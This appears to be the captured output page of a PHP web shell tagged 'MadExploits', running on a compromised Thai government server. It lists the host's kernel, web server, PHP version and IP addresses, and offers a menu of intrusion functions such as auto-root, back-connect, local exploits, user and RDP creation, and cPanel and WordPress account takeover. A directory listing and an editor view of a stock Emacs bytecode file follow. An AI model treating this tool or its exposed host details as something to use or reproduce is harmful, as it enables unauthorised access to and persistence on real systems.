Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
international /
[ HOME SHELL ]
Name
Size
Permission
Action
README
2.63
KB
-rw-r--r--
ccl.elc
38.69
KB
-rw-r--r--
characters.elc
87.76
KB
-rw-r--r--
charprop.el
2.85
KB
-rw-r--r--
cp51932.el
9.41
KB
-rw-r--r--
encoded-kb.elc
9.76
KB
-rw-r--r--
eucjp-ms.el
39.02
KB
-rw-r--r--
fontset.elc
26.34
KB
-rw-r--r--
isearch-x.elc
2.86
KB
-rw-r--r--
iso-ascii.elc
4.85
KB
-rw-r--r--
iso-cvt.elc
18.84
KB
-rw-r--r--
iso-transl.elc
4.98
KB
-rw-r--r--
ja-dic-cnv.elc
12.52
KB
-rw-r--r--
ja-dic-utl.elc
5.04
KB
-rw-r--r--
kinsoku.elc
3.37
KB
-rw-r--r--
kkc.elc
15.03
KB
-rw-r--r--
latexenc.elc
4.42
KB
-rw-r--r--
latin1-disp.elc
44.11
KB
-rw-r--r--
mule-cmds.elc
84.67
KB
-rw-r--r--
mule-conf.el
43.44
KB
-rw-r--r--
mule-diag.elc
31.42
KB
-rw-r--r--
mule-util.elc
10.07
KB
-rw-r--r--
mule.elc
68.68
KB
-rw-r--r--
ogonek.elc
16.89
KB
-rw-r--r--
quail.elc
79.28
KB
-rw-r--r--
robin.elc
8.22
KB
-rw-r--r--
titdic-cnv.elc
35.29
KB
-rw-r--r--
uni-bidi.el
7.93
KB
-rw-r--r--
uni-category.el
10.79
KB
-rw-r--r--
uni-combining.el
7.65
KB
-rw-r--r--
uni-comment.el
7.73
KB
-rw-r--r--
uni-decimal.el
2.28
KB
-rw-r--r--
uni-decomposition.el
26.45
KB
-rw-r--r--
uni-digit.el
2.47
KB
-rw-r--r--
uni-lowercase.el
5.18
KB
-rw-r--r--
uni-mirrored.el
6.8
KB
-rw-r--r--
uni-name.el
117.05
KB
-rw-r--r--
uni-numeric.el
3.74
KB
-rw-r--r--
uni-old-name.el
18.88
KB
-rw-r--r--
uni-titlecase.el
5.28
KB
-rw-r--r--
uni-uppercase.el
5.27
KB
-rw-r--r--
utf-7.elc
2.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mule-util.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:15 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/international/mule-util.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`mule-util.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@110 Convert STRING to a sequence of TYPE which contains characters in STRING. TYPE should be `list' or `vector'. (defalias 'string-to-sequence #[(string type) "\302=\203 \303 \304\"\207\305=\203 \306 !\207\307\310\"\207" [type string list append nil vector vconcat error "Invalid type: %s"] 3 (#$ . 624)]) (make-obsolete 'string-to-sequence "use `string-to-list' or `string-to-vector'." "22.1") #@40 Return a list of characters in STRING. (defalias 'string-to-list #[(string) "\301\302\"\207" [string append nil] 3 (#$ . 1026)]) (put 'string-to-list 'byte-optimizer 'byte-compile-inline-expand) #@42 Return a vector of characters in STRING. (defalias 'string-to-vector #[(string) "\301!\207" [string vconcat] 2 (#$ . 1228)]) (put 'string-to-vector 'byte-optimizer 'byte-compile-inline-expand) #@57 Embed OBJ (string or character) at index IDX of STRING. (defalias 'store-substring #[(string idx obj) "\250\203 \nI\210\202, G G\306 W\203+ \n\\HI\210T\211\202 + \207" [obj string idx i len2 len1 0] 5 (#$ . 1428)]) #@1124 Truncate string STR to end at column END-COLUMN. The optional 3rd arg START-COLUMN, if non-nil, specifies the starting column; that means to return the characters occupying columns START-COLUMN ... END-COLUMN of STR. Both END-COLUMN and START-COLUMN are specified in terms of character display width in the current buffer; see also `char-width'. The optional 4th arg PADDING, if non-nil, specifies a padding character (which should have a display width of 1) to add at the end of the result if STR doesn't reach column END-COLUMN, or if END-COLUMN comes in the middle of a character in STR. PADDING is also added at the beginning of the result if column START-COLUMN appears in the middle of a character in STR. If PADDING is nil, no padding is added in these cases, so the resulting string may be narrower than END-COLUMN. If ELLIPSIS is non-nil, it should be a string which will replace the end of STR (including any padding) if it extends beyond END-COLUMN, unless the display width of STR is equal to or less than the display width of ELLIPSIS. If it is non-nil and not a string, then ELLIPSIS defaults to "...". (defalias 'truncate-string-to-width #[(str end-column &optional start-column padding ellipsis) "\204 \306 \203 ;\204 \307\nG\310\n! \203 G\202 \306 \203* \310 !\202+ \306\306\211\311\211\312\211\211\211\312\313\314\217\210W\203f \203b \315\"\202\331 \311\202\331 \203| V\203| \315Z\"Y\203\316 W\203\241 V\203\241 Z\202\243 \311\312\316\317\217\210V\203\266 \f\203\316 W\203\316 \315Z\"\nO R.\f\207" [start-column ellipsis str from-idx last-idx last-column 0 "..." string-width "" nil (byte-code " W\203 \nH\305\f!\\T\202 \305\207" [column start-column str idx ch char-width] 3) ((args-out-of-range (byte-code "\302\207" [str-len idx nil] 1))) make-string (byte-code " W\203 H\306!\\T\202 \306\207" [column end-column last-column idx last-idx str char-width ch] 3) ((args-out-of-range (byte-code "\302\207" [str-len idx nil] 1))) ch tail-padding head-padding column idx ellipsis-width ellipsis-len str-width str-len padding end-column] 12 (#$ . 1667)]) #@380 Return t if OBJ is a nested alist. Nested alist is a list of the form (ENTRY . BRANCHES), where ENTRY is any Lisp object, and BRANCHES is a list of cons cells of the form (KEY-ELEMENT . NESTED-ALIST). You can use a nested alist to store any Lisp object (ENTRY) for a key sequence KEYSEQ, where KEYSEQ is a sequence of KEY-ELEMENT. KEYSEQ can be a string, a vector, or a list. (defalias 'nested-alist-p #[(obj) "\205\f <\205\f A<\207" [obj] 1 (#$ . 3883)]) (put 'nested-alist-p 'byte-optimizer 'byte-compile-inline-expand) #@278 Set ENTRY for KEYSEQ in a nested alist ALIST. Optional 4th arg LEN non-nil means the first LEN elements in KEYSEQ are considered. Optional 5th argument BRANCHES if non-nil is branches for a keyseq longer than KEYSEQ. See the documentation of `nested-alist-p' for more detail. (defalias 'set-nested-alist #[(keyseq entry alist &optional len branches) "\211\205 <\205 A<)\204 \306\307\"\210\n<\206 \nG\310\311\211W\203z \211\205>